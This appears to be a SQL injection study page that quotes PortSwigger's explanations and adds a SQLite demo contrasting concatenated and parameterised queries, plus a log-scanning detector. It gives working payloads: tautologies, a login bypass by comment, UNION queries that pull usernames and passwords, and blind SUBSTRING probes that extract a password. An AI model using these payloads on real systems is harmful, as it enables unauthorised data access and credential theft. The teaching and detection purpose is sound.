SQL injection

Simple SQL query examples


http://michalszalkowski.com/api/user?id={payload1}&name={payload2}&email={payload3}&file1={payload4}&file2={payload5}
SELECT * FROM user;
SELECT id,name,email,password FROM user;
SELECT id,name,email,password FROM user WHERE id = {payload1};
SELECT id,name,email,password FROM user WHERE name = '{payload2}';
SELECT id,name,email,password FROM user WHERE name = '{payload2}' ORDER BY id ASC;
SELECT id,name,email,password FROM user WHERE name = '{payload2}' ORDER BY id ASC LIMIT 10;
SELECT id,name,email,password FROM user WHERE name LIKE '{payload2}%' ORDER BY id ASC LIMIT 10;
SELECT id,name,email,password FROM user WHERE name LIKE '{payload2}%' AND (file1 = '{payload4}' OR file2 = '{payload5}') ORDER BY id ASC LIMIT 10;

What is SQL injection (SQLi)?


SQL injection (SQLi) is a web security vulnerability that allows an attacker to interfere with the queries that an application makes to its database. It generally allows an attacker to view data that they are not normally able to retrieve. This might include data belonging to other users, or any other data that the application itself is able to access. In many cases, an attacker can modify or delete this data, causing persistent changes to the application's content or behavior.

In some situations, an attacker can escalate a SQL injection attack to compromise the underlying server or other back-end infrastructure, or perform a denial-of-service attack. source:portswigger.net

SQL injection examples


There are a wide variety of SQL injection vulnerabilities, attacks, and techniques, which arise in different situations. Some common SQL injection examples include:

  • Retrieving hidden data, where you can modify a SQL query to return additional results.
  • Subverting application logic, where you can change a query to interfere with the application's logic.
  • UNION attacks, where you can retrieve data from different database tables.
  • Examining the database, where you can extract information about the version and structure of the database.
  • Blind SQL injection, where the results of a query you control are not returned in the application's responses.

Retrieving hidden data


before https://insecure-website.com/products?category=Gifts'--

SELECT * FROM products WHERE category = 'Gifts'--' AND released = 1

after https://insecure-website.com/products?category=Gifts'+OR+1=1--

SELECT * FROM products WHERE category = 'Gifts' OR 1=1--' AND released = 1

Subverting application logic


before

SELECT * FROM users WHERE username = 'wiener' AND password = 'bluecheese'
after username = administrator' -- -lorem

SELECT * FROM users WHERE username = 'administrator' -- -lorem' AND password = 'bluecheese'
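The two cases above (hidden rows reached through `category`, and the password check commented out through `username`) run end to end against a constructed in-memory SQLite database in this added example, which is not part of the original page: each string-concatenated query sits beside its parameterised form, which treats the same input purely as a value. The table contents and the use of Python's sqlite3 module are assumptions, and the page's URL-encoded payload is used in decoded form.

```python
import sqlite3

# Constructed in-memory schema mirroring the page's products/users examples.
def setup_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE products (name TEXT, category TEXT, released INTEGER);
        INSERT INTO products VALUES ('Mug', 'Gifts', 1),
                                    ('Unreleased Box', 'Gifts', 0),
                                    ('Pen', 'Office', 1);
        CREATE TABLE users (username TEXT, password TEXT);
        INSERT INTO users VALUES ('wiener', 'bluecheese'), ('administrator', 'abc123');
    """)
    return conn

def products_concat(conn, category):
    # Vulnerable: the input is spliced into the SQL text, so a quote and
    # a '--' inside it are parsed as SQL grammar, not as data.
    sql = ("SELECT name FROM products WHERE category = '" + category
           + "' AND released = 1")
    return [row[0] for row in conn.execute(sql)]

def products_bound(conn, category):
    # Hardened: the input is a bound parameter, so it is only ever compared
    # as a string value and 'released = 1' cannot be commented out.
    sql = "SELECT name FROM products WHERE category = ? AND released = 1"
    return [row[0] for row in conn.execute(sql, (category,))]

def login_concat(conn, username, password):
    # Vulnerable: a username ending in a comment marker drops the password check.
    sql = ("SELECT username FROM users WHERE username = '" + username
           + "' AND password = '" + password + "'")
    row = conn.execute(sql).fetchone()
    return row[0] if row else None

def login_bound(conn, username, password):
    # Hardened: both predicates always apply, whatever the inputs contain.
    sql = "SELECT username FROM users WHERE username = ? AND password = ?"
    row = conn.execute(sql, (username, password)).fetchone()
    return row[0] if row else None

if __name__ == "__main__":
    db = setup_db()
    print(products_concat(db, "Gifts'--"))         # ['Mug', 'Unreleased Box']
    print(products_concat(db, "Gifts' OR 1=1--"))  # ['Mug', 'Unreleased Box', 'Pen']
    print(products_bound(db, "Gifts' OR 1=1--"))   # []
    print(login_concat(db, "administrator' -- -lorem", "wrong"))  # administrator
    print(login_bound(db, "administrator' -- -lorem", "wrong"))   # None
```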

Retrieving data from other database tables


before

SELECT name, description FROM products WHERE category = 'Gifts'

after

SELECT name, description FROM products WHERE category = 'Gifts' UNION SELECT NULL, NULL -- -lorem
SELECT name, description FROM products WHERE category = 'Gifts' UNION SELECT username, password FROM users -- -lorem

SQL injection UNION attacks

When an application is vulnerable to SQL injection and the results of the query are returned within the application's responses, the UNION keyword can be used to retrieve data from other tables within the database. This results in a SQL injection UNION attack. source:portswigger.net

SELECT a,b FROM table1 UNION SELECT NULL, NULL
SELECT a,b FROM table1 UNION SELECT 'a', NULL
SELECT a,b FROM table1 UNION SELECT username,password FROM users -- -lorem

Examining the database


Select version

  • Oracle -> SELECT BANNER FROM v$version
  • MSSQL -> SELECT @@version
  • MySQL -> SELECT @@version
  • Postgres -> SELECT version()

Blind SQL injection


Many instances of SQL injection are blind vulnerabilities. This means that the application does not return the results of the SQL query or the details of any database errors within its responses. Blind vulnerabilities can still be exploited to access unauthorized data, but the techniques involved are generally more complicated and difficult to perform.

Depending on the nature of the vulnerability and the database involved, the following techniques can be used to exploit blind SQL injection vulnerabilities:

  • You can change the logic of the query to trigger a detectable difference in the application's response depending on the truth of a single condition. This might involve injecting a new condition into some Boolean logic, or conditionally triggering an error such as a divide-by-zero.
  • You can conditionally trigger a time delay in the processing of the query, allowing you to infer the truth of the condition based on the time that the application takes to respond.
  • You can trigger an out-of-band network interaction, using OAST techniques. This technique is extremely powerful and works in situations where the other techniques do not. Often, you can directly exfiltrate data via the out-of-band channel, for example by placing the data into a DNS lookup for a domain that you control. source:portswigger.net

# password = abc123
... AND SUBSTRING((SELECT password FROM users WHERE username ='administrator'),1,1) = 'a' -- -lorem
... AND SUBSTRING((SELECT password FROM users WHERE username ='administrator'),2,1) = 'b' -- -lorem
... AND SUBSTRING((SELECT password FROM users WHERE username ='administrator'),3,1) = 'c' -- -lorem
... AND SUBSTRING((SELECT password FROM users WHERE username ='administrator'),4,1) = '1' -- -lorem
... AND SUBSTRING((SELECT password FROM users WHERE username ='administrator'),5,1) = '2' -- -lorem
... AND SUBSTRING((SELECT password FROM users WHERE username ='administrator'),6,1) = '3' -- -lorem
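For the character-by-character probes above, the defender-side counterpart is spotting them in traffic. This added example, not from the original page, scans constructed web-server access log lines for the payload shapes shown on this page (comment terminators, OR 1=1 tautologies, UNION SELECT probes, SUBSTRING probes and time-delay functions) and flags clients that send a run of blind probes. The log format, the probe threshold and the sample lines are all assumptions.

```python
import re
from collections import Counter
from urllib.parse import unquote_plus

# Signatures drawn from the payload shapes shown on this page: comment
# terminators, tautologies, UNION probes, character-by-character SUBSTRING
# probes and time-delay functions used for blind injection.
SIGNATURES = {
    "comment_terminator": re.compile(r"(--|#|/\*)"),
    "tautology": re.compile(r"\bOR\s+\d+\s*=\s*\d+", re.I),
    "union_probe": re.compile(r"\bUNION\s+(ALL\s+)?SELECT\b", re.I),
    "substring_probe": re.compile(r"\bSUBSTR(ING)?\s*\(", re.I),
    "time_delay": re.compile(r"\b(SLEEP|pg_sleep|WAITFOR|BENCHMARK)\b", re.I),
}

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d+)')

def classify_request(path):
    """Return the set of signature names matched by the URL-decoded query string."""
    query = path.partition("?")[2]
    decoded = unquote_plus(query)
    return {name for name, rx in SIGNATURES.items() if rx.search(decoded)}

def scan_log(lines, probe_threshold=3):
    """Flag single suspicious requests and clients sending repeated blind probes."""
    hits = []
    probes_per_ip = Counter()
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that do not parse as common log format
        tags = classify_request(m["path"])
        if tags:
            hits.append((m["ip"], sorted(tags)))
        if "substring_probe" in tags or "time_delay" in tags:
            probes_per_ip[m["ip"]] += 1
    blind_suspects = sorted(ip for ip, n in probes_per_ip.items() if n >= probe_threshold)
    return hits, blind_suspects

# Constructed sample log lines (common log format), not real traffic.
SAMPLE_LOG = [
    '203.0.113.5 - - [01/Jan/2024:10:00:00 +0000] "GET /products?category=Gifts HTTP/1.1" 200 512',
    '203.0.113.9 - - [01/Jan/2024:10:00:01 +0000] "GET /products?category=Gifts%27+OR+1%3D1-- HTTP/1.1" 200 9876',
    '203.0.113.9 - - [01/Jan/2024:10:00:02 +0000] "GET /products?category=Gifts%27+UNION+SELECT+NULL%2CNULL-- HTTP/1.1" 500 120',
    '198.51.100.7 - - [01/Jan/2024:10:00:03 +0000] "GET /products?category=Gifts%27+AND+SUBSTRING%28%28SELECT+password+FROM+users%29%2C1%2C1%29%3D%27a%27-- HTTP/1.1" 200 512',
    '198.51.100.7 - - [01/Jan/2024:10:00:04 +0000] "GET /products?category=Gifts%27+AND+SUBSTRING%28%28SELECT+password+FROM+users%29%2C2%2C1%29%3D%27b%27-- HTTP/1.1" 200 512',
    '198.51.100.7 - - [01/Jan/2024:10:00:05 +0000] "GET /products?category=Gifts%27+AND+SUBSTRING%28%28SELECT+password+FROM+users%29%2C3%2C1%29%3D%27c%27-- HTTP/1.1" 200 512',
]
```

Running `scan_log(SAMPLE_LOG)` returns five tagged requests and lists 198.51.100.7 as the only client meeting the blind-probe threshold; the single `--` check will also match benign text, so in production the tags are best treated as a score rather than a verdict.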